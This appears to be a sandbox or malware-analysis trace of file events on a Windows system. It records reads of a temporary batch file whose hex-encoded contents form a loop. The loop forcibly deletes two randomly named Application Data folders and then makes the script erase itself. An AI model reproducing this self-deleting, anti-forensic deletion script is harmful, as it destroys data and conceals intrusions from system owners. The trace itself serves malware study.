File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 success or wait 2109911653
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E success or wait 2109927049
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv Access: read attributes and delete and synchronize Options: directory file and synchronous io non alert and open for backup ident and open reparse point object name not found 2109940011
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 success or wait 2109947964
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze Access: read attributes and delete and synchronize Options: directory file and synchronous io non alert and open for backup ident and open reparse point object name not found 2109961148
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 20 67 6F 74 6F 20 64 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D success or wait 2109967275
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 success or wait 2110014574
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 8192 Value: 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 34 64 39 34 65 34 64 37 2E 62 61 74 22 0D 0A 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 success or wait 2110031192
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Access: read attributes and delete Options: non directory file and open for backup ident and open reparse point success or wait 2110046261
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false object name not found 2110050678